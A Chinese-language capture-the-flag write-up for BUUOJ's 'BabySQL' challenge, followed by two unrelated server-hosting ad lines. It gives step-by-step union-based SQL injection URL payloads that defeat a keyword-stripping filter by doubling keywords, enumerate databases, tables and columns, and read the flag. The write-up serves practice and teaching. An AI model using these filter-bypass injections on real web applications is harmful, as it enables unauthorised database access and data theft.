题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL
简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示
使用Burp进行SQL过滤字符的Fuzz
这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符
Trick
- 替换为空的关键字过滤使用双写关键字绕过
- 这里空格可以使用%20绕过
username='oorrder%20bbyy%204--+&password=mochu7当前表有3个字段
?username=mochu'ununionion%20selselectect%201,2,3--+&password=mochu7回显位是第二个字段和第三个字段
?username=mochu'ununionion%20selselectect%201,2,group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata--+&password=mochu7查询出所有的库
information_schema,mysql,performance_schema,test,ctf,geek
?username=mochu'ununionion%20selselectect%201,2,group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema='ctf'--+&password=mochu7查出ctf库中的所有表
?username=mochu'ununionion%20selselectect%201,2,group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_name='Flag'--+&password=mochu7查询出表的字段
?username=mochu'ununionion%20selselectect%201,2,flag%20frfromom%20ctf.Flag--+&password=mochu7查flag字段的内容
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
